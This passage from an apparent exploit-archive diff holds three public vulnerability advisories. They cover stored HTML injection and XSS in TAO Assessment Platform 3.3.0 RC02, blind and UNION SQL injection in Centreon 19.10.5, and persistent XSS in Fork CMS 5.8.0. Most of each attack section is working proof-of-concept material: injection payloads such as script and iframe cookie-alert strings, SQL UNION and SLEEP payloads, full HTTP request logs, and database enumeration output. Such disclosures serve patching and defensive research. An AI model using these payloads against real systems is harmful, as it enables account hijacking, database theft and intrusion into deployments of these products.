is POST and the attack vector is application-side.
Remote attackers are able to inject html code for the user account
credentials to provoke an execution within the main manage
user listing.
Successful exploitation of the web vulnerability results in persistent
phishing attacks, persistent external redirects to malicious
source and persistent manipulation of affected application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Manage Users
Vulnerable Parameter(s):
[+] userFirstName
[+] userLastName
[+] userMail
[+] password2
[+] password3
1.2
Multiple persistent cross site web vulnerabilities has been discovered
in the TAO Open Source Assessment Platform v3.3.0 RC02.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The persistent vulnerability is located in the content parameter of the
Rubric Block (Add) module. Attackers are able to inject own malicious
script code inside of the rubric name value. The attached values will be
redisplayed in the frontend of tao. The request method to inject is
POST and the attack vector is located on the application-side. The
injection point is the Rubric Block (Add) module and the execution occurs
in the frontend panel when listing the item attribute.
Successful exploitation of the web vulnerability results in session
hijacking, persistent phishing attacks, persistent external redirects
to malicious source and persistent manipulation of affected or connected
application modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Rubric Block (Add)
Vulnerable Parameter(s):
[+] content
Proof of Concept (PoC):
=======================
1.1
The persistent html injection web vulnerability can be exploited by
remote attackers with privileged user account and low user interaction.
For security demonstration or to reproduce the security web
vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Install the application and open the ui
2. Move on top right to the user button and click manage users
3. Inject html script code payload into the vulnerable input fields
4. Save the entry
5. Open to the manage users listing
Note: The payloads executes in the table that shows the user account
values for admins
6. Successful reproduce of the html inject vulnerability!
PoC: Vulnerable Source (Manage Users)
<th class="actions">Actions</th>
</tr></thead>
<tbody>
<tr data-item-identifier="http_2_localhost_1_tao_0_rdf_3_i1586957152301539">
<td class="login"><img
src="https://www.evolution-sec.com/evosec-logo.png"></td>
<td class="firstname"><img
src="https://www.evolution-sec.com/evosec-logo.png"></td>
<td class="lastname"><img
src="https://www.evolution-sec.com/evosec-logo.png"></td>
<td class="email"><img
src="https://www.evolution-sec.com/evosec-logo.png"></td>
<td class="roles">Test Taker</td>
<td class="guiLg">German</td>
<td class="status"><span class="icon-result-ok"></span> enabled</td>
--- PoC Session Logs (POST) ---
http://localhost:89/tao/Users/edit
Host: localhost:89
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0)
Gecko/20100101 Firefox/74.0
Accept: text/html, */*; q=0.01
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 1393
Origin: http://localhost:89
Connection: keep-alive
Referer:
http://localhost:89/tao/Main/index?structure=users&ext=tao&section=edit_user
Cookie: tao_GP8CPowQ=d6et7oifjip9jnkbc7pgeotsdj;
tao_0855799=e0a3289004cc96a4ffba7bdcb8515d3665ccd004
user_form_sent=1&tao.forms.instance=1&token=e0a3289004cc96a4ffba7bdcb8515d3665ccd004&http_2_www_0_w3_0_org_1_2000_1_01_1_
rdf-schema_3_label=<img
src="https://www.evolution-sec.com/evosec-logo.png">&id=http://localhost/tao.rdf#i1586957152301539
&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userFirstName=<img
src="https://www.evolution-sec.com/evosec-logo.png">
&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userLastName=<img
src="https://www.evolution-sec.com/evosec-logo.png">
&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userMail=<img
src="https://www.evolution-sec.com/evosec-logo.png">&http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userUILg=http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_Langca&
http_2_www_0_tao_0_lu_1_Ontologies_1_generis_0_rdf_3_userRoles_9=http_2_www_0_tao_0_lu_1_Ontologies_1_TAO_0_rdf_3_DeliveryRole&
classUri=http_2_www_0_tao_0_lu_1_Ontologies_1_TAOSubject_0_rdf_3_Subject&uri=http_2_localhost_1_tao_0_rdf_3_i1586957152301539
&password2=<img src="https://www.evolution-sec.com/evosec-logo.png">
&password3=<img src="https://www.evolution-sec.com/evosec-logo.png">
-
POST: HTTP/1.1 200 OK
Server: Apache/2.4.38 (Win32) PHP/7.2.15
X-Powered-By: PHP/7.2.15
Set-Cookie: tao_0855799=a4dd4f04e0f27648dcd6ee3e966cdb380d511079; path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Reference(s):
http://localhost:89/tao/Users/edit
http://localhost:89/tao/Main/index
1.2
The persistent cross site scripting web vulnerability can be exploited
by remote attackers with privileged user account with low user interaction.
For security demonstration or to reproduce the cross site scripting web
vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open and login to the tao application
2. Move into the test module on top
3. Add new Rubric Block
4. Inject script code test payload into the text label content input field
5. Save the entry and move on the right site to activate
6. The click on activate includes and executes the content immediatly
7. Succesful reproduce of the cross site scripting vulnerability!
PoC: Vulnerable Source
<div class="rubricblock-content"><div>asd>"><span
data-serial="img_l9lmylhuv8hf55xo9z264n"
class="widget-box widget-inline widget-img" data-qti-class="img"
contenteditable="false">
<img data-serial="img_l9lmylhuv8hf55xo9z264n" data-qti-class="img"
src="" alt="" style=""
width="100%"></span> <img data-serial="img_rxephz0lwthtejgsndo2f3"
data-qti-class="img" src="evil.source" alt="" style="">&nbsp;
>"<script>alert(document.cookie)></script></div></iframe></div></div>
</li></ol>
PoC: Payload
"<script>alert(document.cookie)></script>
--- PoC Session Logs [POST] ---
http://localhost:89/taoQtiTest/Creator/saveTest?uri=http%3A%2F%2Flocalhost%2Ftao.rdf%23i1586971961942612
Host: localhost:89
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9664
Origin: http://localhost:89
Connection: keep-alive
Referer:
http://localhost:89/tao/Main/index?structure=tests&ext=taoTests&section=authoring
Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb;
tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042
model={"qti-type":"assessmentTest","identifier":"Test-1","title":"QTI
Example Test","toolName":"tao","toolVersion":"2.7","outcomeDeclarations":[],
"timeLimits":{"qti-type":"timeLimits","maxTime":7810,"allowLateSubmission":false},"testParts":[{"qti-type":"testPart","identifier":"Introduction","navigationMode":1,"submissionMode":0,"preConditions":[],"branchRules":[],
"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":0,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":false,
"validateResponses":false,"allowSkipping":true},"assessmentSections":[{"qti-type":"assessmentSection","title":"Section
1","visible":true,
"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971963337314","categories":[],
"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-1","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,
"itemSessionControl"{"qtitype":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,
"validateResponses":false,"allowSkipping":true},"isLinear":false}],"identifier":"assessmentSection-1","required":true,"fixed":false,"preConditions":[],"branchRules":[],
"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,"validateResponses":
false,"allowSkipping":true},"index":0}],"testFeedbacks":[],"index":0},{"qti-type":"testPart","identifier":"QTIExamples","navigationMode":0,"submissionMode":0,"preConditions":[],"branchRules":[],"assessmentSections":[{"qti-type":"assessmentSection","title":"Section
1","visible":false,"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971964187315","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowComment":false,"allowSkipping":true,"validateResponses":false},"isLinear":true,
"timeLimits":{"maxTime":0,"minTime":0,"allowLateSubmission":false,"qti-type":"timeLimits"}},{"qti-type":"assessmentItemRef",
"href":"http://localhost/tao.rdf#i1586971965925016","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-3","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":1,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},
{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697196662817","categories":[],"variableMappings":[],"weights":[],
"templateDefaults":[],"identifier":"item-4","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":2,"itemSessionControl
":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971967539318","categories"
:[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-5","required":false,"fixed":false,"preConditions":[],"branchRules":[],
"index":3,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":
"http://localhost/tao.rdf#i1586971968508019","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-6",
"required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":4,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971969922220","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":
"item-7","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":5,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697197087021","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-8","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":6,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971970668622","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":
"item-9","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":7,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}],"identifier":"assessmentSection-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,
"itemSessionControl":{"qti-type":"itemSessionControl"},"rubricBlocks":[{"qti-type":"rubricBlock","index":0,"content":[{"qti-type":"div","id":"","class":"","xmlBase":"","lang":"","label":"","content":[{"qti-type":"textRun","content":"asd>"<script>alert(document.cookie)></script>",
"xmlBase":""}]}],"views":["candidate"],"orderIndex":1,"uid":"rb1","feedback":{"activated":false,"outcome":null,"matchValue":null,"qti-type":"feedback"},
"class":""}]}],"testFeedbacks":[],"index":1}],"testFeedbacks":[],"scoring":{"modes":{"none":{"key":"none","label":"None","description":"No
outcome processing.
Erase the existing rules, if
any.","qti-type":"none"},"custom":{"key":"custom","label":"Custom","description":"bufu","qti-type":"cut"},"qti-type":"modes"},"scoreIdentifier":"SCORE","weightIdentifier":"","cutScore":0.5,"categoryScore":false,"outcomeProcessing":"none","qti-type":"scoring"}}
-
POST: HTTP/1.1 200 OK
Server: Apache/2.4.38 (Win32) PHP/7.2.15
X-Powered-By: PHP/7.2.15
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: frame-ancestors 'self'
Content-Length: 14
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/json; charset=UTF-8
-
http://localhost:89/tao/Main/evil.source
Host: localhost:89
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer:
http://localhost:89/tao/Main/index?structure=tests&ext=taoTests&section=authoring
Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb;
tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.38 (Win32) PHP/7.2.15
X-Powered-By: PHP/7.2.15
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 169
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Security Risk:
==============
1.1
The security risk of the html inject web vulnerability in the
web-application is estimated as medium.
1.2
The security risk of the persistent cross site scripting web
vulnerability in the web-application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM

69
exploits/php/webapps/48345.txt Normal file
View file

@ -0,0 +1,69 @@
# Exploit Title: Centreon 19.10.5 - 'id' SQL Injection
# Date: 2020-04-19
# Exploit Author: Basim alabdullah
# Vendor Homepage: https://www.centreon.com
# Software Link: https://download.centreon.com/
# Version: v.19.10.5
# Tested on: Centos 5
[EXECUTIVE SUMMARY]
Centreon has come a long way from its early roots. A user-friendly monitoring console on Nagios before, Centreon is today, a rich monitoring platform powered by Centreon Engine, Centreon Broker and Centreon Web.
Monitoring-savvy IT practitioners who want Nagios-inspired flexibility without its complexity, easily embrace Centreon for robust infrastructure systems and network performance monitoring.
Downloaded by hundreds and thousands of IT professionals worldwide.
The analysis discovered a time-based blind SQL
injection vulnerability in the tracker functionality of
Centreon Monitoring software. A malicious user can inject arbitrary
SQL commands to the application. The vulnerability lies in the project tracker
service search functionality; depending on project visibility successful
exploitation may require user authentication. A successful attack
can read, modify or delete data from the database or execute arbitrary commands on the underlying system.
[VULNERABLE VERSIONS]
The following version of the Centreon Monitoring was affected by the
vulnerability; previous versions may be vulnerable as well:
- Centreon version 19.10.5
[Proof of Concept]
http://TARGET/centreon/include/monitoring/acknowlegement/xml/broker/makeXMLForAck.php?hid=15&svc_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176706b71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x716b716b71%29%2CNULL%2CNULL%23
[Payloads]
Parameter: svc_id (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
Payload: hid=15&svc_id=1 OR NOT 5782=5782
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: hid=15&svc_id=1 AND (SELECT 1615 FROM (SELECT(SLEEP(5)))TRPy)
Type: UNION query
Title: MySQL UNION query (NULL) - 5 columns
Payload: hid=15&svc_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x724b66756a476759544f48716d61496b5a68754a4c6f42634e6e775272724c44616e567355527a6f,0x716b716b71),NULL,NULL#
---
[12:24:35] [INFO] testing MySQL
[12:24:35] [INFO] confirming MySQL
[12:24:35] [INFO] the back-end DBMS is MySQL
[12:24:35] [INFO] fetching banner
web server operating system: Linux Red Hat
web application technology: Apache 2.4.34, PHP 7.2.24
back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
banner: '10.1.38-MariaDB'
[12:24:35] [INFO] fetching database names
[12:24:35] [INFO] starting 4 threads
[12:24:35] [INFO] resumed: 'centreon'
[12:24:35] [INFO] resumed: 'test'
[12:24:35] [INFO] resumed: 'centreon_storage'
[12:24:35] [INFO] resumed: 'information_schema'
available databases [4]:
[*] centreon
[*] centreon_storage
[*] information_schema
[*] test

491
exploits/php/webapps/48348.txt Normal file
View file

@ -0,0 +1,491 @@
# Title: Fork CMS 5.8.0 - Persistent Cross-Site Scripting
# Author: Vulnerability Laboratory
# Date: 2020-04-15
# Vendor: https://www.fork-cms.com/download
# Software Link: https://github.com/forkcms/forkcms/pull/3073
# CVE: N/A
Document Title:
===============
Fork CMS v5.8.0 - Multiple Persistent Web Vulnerbilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2208
ID (3073): https://github.com/forkcms/forkcms/pull/3073
Release Date:
=============
2020-04-17
Vulnerability Laboratory ID (VL-ID):
====================================
2208
Common Vulnerability Scoring System:
====================================
5.3
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Fork is an easy to use open source CMS using Symfony Components. Fork
CMS is dedicated to creating a user friendly environment
to build, monitor and
update your website. We take great pride in being the Content Management
System of choice for beginners and professionals.
(Copy of the Homepage: https://www.fork-cms.com &
https://www.fork-cms.com/download )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple
persistent web vulnerabilities in the official Fork CMS v5.8.0.
Affected Product(s):
====================
ForkCMS
Product: Fork CMS v5.8.0 - Content Management System (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2020-04-17: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted authentication (user/moderator) - User privileges
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple persistent input validation web vulnerabilities has been
discovered in the official Fork CMS v5.8.0 open-source web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser to
web-application requests from the application-side.
The persistent input validation web vulnerabilities are located in the
`Displayname` input field when using the `Add`, `Edit` or `Register`
mechanism that forwards the information into the `var` parameter. Remote
attackers and privileged application user accounts are able to
inject own malicious persistent script code as the users displayname by
usage of the registration module (/profiles/register). Privileged
users with access to the profile or users module are able to exploit the
issue by a simple inject. The displayname then becomes visible in
the Admin - Profiles Index on Preview, Edit User/Profile, Delete User
Interaction and User Index in Listing modules. the var parameter
does not encode or parse the exisiting injected content and executes it.
The request method to inject is POST and the attack vector of the
vulnerability is located on the application-side of the content
management system. The injection point is located in the registration form
and the add/edit user function. The execution point of the issue occurs
in the preview profile, edit user, user index listing and delete
user message context.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external redirects to
malicious source and persistent manipulation of affected application
modules.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] Register
[+] Add User
[+] Edit User
Vulnerable Input(s):
[+] Displayname
Vulnerable Parameter(s):
[+] var
Affected Module(s):
[+] Preview Profile
[+] Edit User
[+] User Index
[+] Delete User
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerabilities can be exploited by
remote attackers with low privileged user account and low user interaction.
For security demonstration or to reproduce the security vulnerability
follow the provided information an steüs below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the fork cms web-application newst version
2. Move via sitemap or by link to the registration page
(/modules/profiles/register)
3. Inject your script code payload html/js to the Displayname input field
4. Register the account by pushing submit
5. Activate the link in the account registration email
Note: Now simple wait until the administrator / privileged user visits
the panel to execute the code on interaction or preview only
6. Successful reproduce of the persistent script code injection
vulnerability!
PoC: Vulnerable Source (User Index in Listing -
https://fork-cms.localhost:8080/private/en/users/index)
<tr id="row-2" class="even">
<td class="nickname"><a
href="/private/en/users/edit?token=k7byefqor8&id=2"
title="edit">test3"><iframe src="evil.source"
onload=alert(document.cookie)></a></td>
<td class="fork-data-grid-action actionEdit"><a
href="/private/en/users/edit?token=k7byefqor8&id=2"
class="btn btn-default btn-xs pull-right">
<span class="fa fa-pencil" aria-hidden="true"></span>&nbsp;Edit</a></td>
</tr>
PoC: Vulnerable Source (Profiles Index on Preview -
https://fork-cms.localhost:8080/private/en/profiles/index)
<tbody><tr id="row-1" class="odd">
<td class="check"><input type="checkbox" name="id[]" value="1"
class="inputCheckbox checkBeforeUnload"></td>
<td class="email"><a
href="/private/en/profiles/edit?token=k7byefqor8&id=1"
title="">tester23@protonmail.com</a></td>
<td class="display_name">"<iframe src="evil.source"
onload="alert(document.cookie)"></td>
<td class="registered_on">13 April 2020 11:17</td>
<td class="fork-data-grid-action actionEdit">
<a href="/private/en/profiles/edit?token=k7byefqor8&id=1" class="btn
btn-default btn-xs pull-right">
<span class="fa fa-pencil" aria-hidden="true"></span>&nbsp;Edit</a></td>
</tr></tbody>
PoC: Vulnerable Source (Delete User - On Interaction)
<form name="delete" method="post"
action="/private/en/users/delete?token=k7byefqor8">
<input type="hidden" id="delete__token" name="delete[_token]"
value="q3ADogMObka_-73n5afnMPsJHj9ZAI_ch5uiabqDsqs" />
<input type="hidden" id="delete_id" name="delete[id]" value="2" />
<div class="modal fade" id="confirmDelete" role="dialog" tabindex="-1"
aria-hidden="true" aria-labelledby="confirmDeleteTitle">
<div class="modal-dialog"><div class="modal-content"><div
class="modal-header">
<h4 class="modal-title" id="confirmDeleteTitle">Delete</h4></div>
<div class="modal-body">
<p>Are your sure you want to delete the user "evil.source"><iframe
src=evil.source onload=alert(document.cookie)>"?</p></div>
<div class="modal-footer">
<button class="btn btn-default" title="Cancel" data-dismiss="modal">
<span class="fa fa-times" aria-hidden="true"></span>
<span class="btn-text">Cancel</span></button>
<button class="btn btn-danger" title="Delete" >
<span class="fa fa-trash" aria-hidden="true"></span>
<span class="btn-text">Delete</span>
</button></div></div></div></div>
</form>
--- PoC Session Logs [POST] (Registration User Account) ---
https://fork-cms.localhost:8080/en/modules/profiles/register#registerForm
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://fork-cms.localhost:8080/en/modules/profiles/register
Content-Type: application/x-www-form-urlencoded
Content-Length: 179
Origin: https://fork-cms.localhost:8080
Connection: keep-alive
Cookie:
track=s%3A32%3A%229739044e17a322bae65870698df9b79e%22%3B;PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d;
interface_language=en; frontend_language=en; cookie_bar_agree=Y;
cookie_bar_hide=Y;
form=register&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&display_name=>"<iframe
src=evil.source
onload=alert(document.cookie)>&email=tester23@protonmail.com&password=pwnd
-
POST: HTTP/1.1 302 Found
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: frontend_language=en; expires=Wed, 13-May-2020 09:49:57 GMT;
Max-Age=2592000;
path=/; domain=.fork-cms.localhost:8080; httponly; samesite=lax
track=s%3A32%3A%229739044e17a322bae65870698df9b79e%22%3B; expires=Tue,
13-Apr-2021 09:49:57 GMT;
Max-Age=31536000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location: https://fork-cms.localhost:8080
X-server: fork01
-- PoC Session Logs [POST] (Add User) ---
https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
Content-Type: multipart/form-data;
boundary=---------------------------56051791419552543783889366402
Content-Length: 2545
Origin: https://fork-cms.localhost:8080
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
Upgrade-Insecure-Requests: 1
form=add&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&email=tester232323@protonmail.com&password=tester445
&confirm_password=tester445&name=test1&surname=test2&nickname=test3>"<iframe
src=a onload=alert(document.cookie)>&avatar=
&interface_language=en&preferred_editor=ck-editor&date_format=j F
Y&time_format=H:i&number_format=dot_nothing
&csv_split_character=;&csv_line_ending=n&active=1&groups[]=1&add=
-
POST: HTTP/1.1 302 Found
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location:
/private/en/users/index?token=k7byefqor8&report=added&var=test3>"<iframe
src=evil.source onload=alert(document.cookie)>&highlight=row-4
X-server: fork01
-
https://fork-cms.localhost:8080/private/en/users/index?token=k7byefqor8&report=added&var=test3>"<iframe
src=evil.source onload=alert(document.cookie)>&highlight=row-4
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/add?token=k7byefqor8
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
-
POST: HTTP/1.1 200 OK
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Content-Length: 3615
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Vary: Accept-Encoding
Content-Encoding: gzip
X-server: fork01
-
GET: HTTP/1.1 200 OK
Server: nginx/1.6.2
https://fork-cms.localhost:8080/private/en/users/evil.source
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:44:47
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location: /private/en/error?type=action-not-allowed
X-server: fork01
-- PoC Session Logs [POST] (Edit User) ---
https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
Host: fork-cms.localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0)
Gecko/20100101 Firefox/75.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer:
https://fork-cms.localhost:8080/private/en/users/edit?token=k7byefqor8&id=2
Content-Type: multipart/form-data;
boundary=---------------------------388544425912514902093103180709
Content-Length: 2563
Origin: https://fork-cms.localhost:8080
Connection: keep-alive
Cookie: PHPSESSID=dc1ffd3d01b2200d81b05cacb58e758d; interface_language=en
form=edit&form_token=f1e7f2e9077b0400f5e97591ac09ef3e&email=testemail337@protonmail.com&name=test1&surname=test2
&nickname=test3>"<iframe src=evil.source
onload=alert(document.cookie)>&avatar=&new_password=&confirm_password=
&interface_language=en&preferred_editor=ck-editor&date_format=j F
Y&time_format=H:i&number_format=dot_nothing&
csv_split_character=;&csv_line_ending=n&active=1&groups[]=1&edit=
-
POST: HTTP/1.1 302 Found
Server: nginx/1.6.2
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=0, must-revalidate, private
Set-Cookie: interface_language=en; expires=Wed, 13-May-2020 08:34:55
GMT; Max-Age=2592000; path=/; domain=.fork-cms.localhost:8080; httponly;
samesite=lax
Location:
/private/en/users/index?token=k7byefqor8&report=edited&var=test3>"<iframe src=evil.source
onload=alert(document.cookie)>&highlight=row-2
X-server: fork01
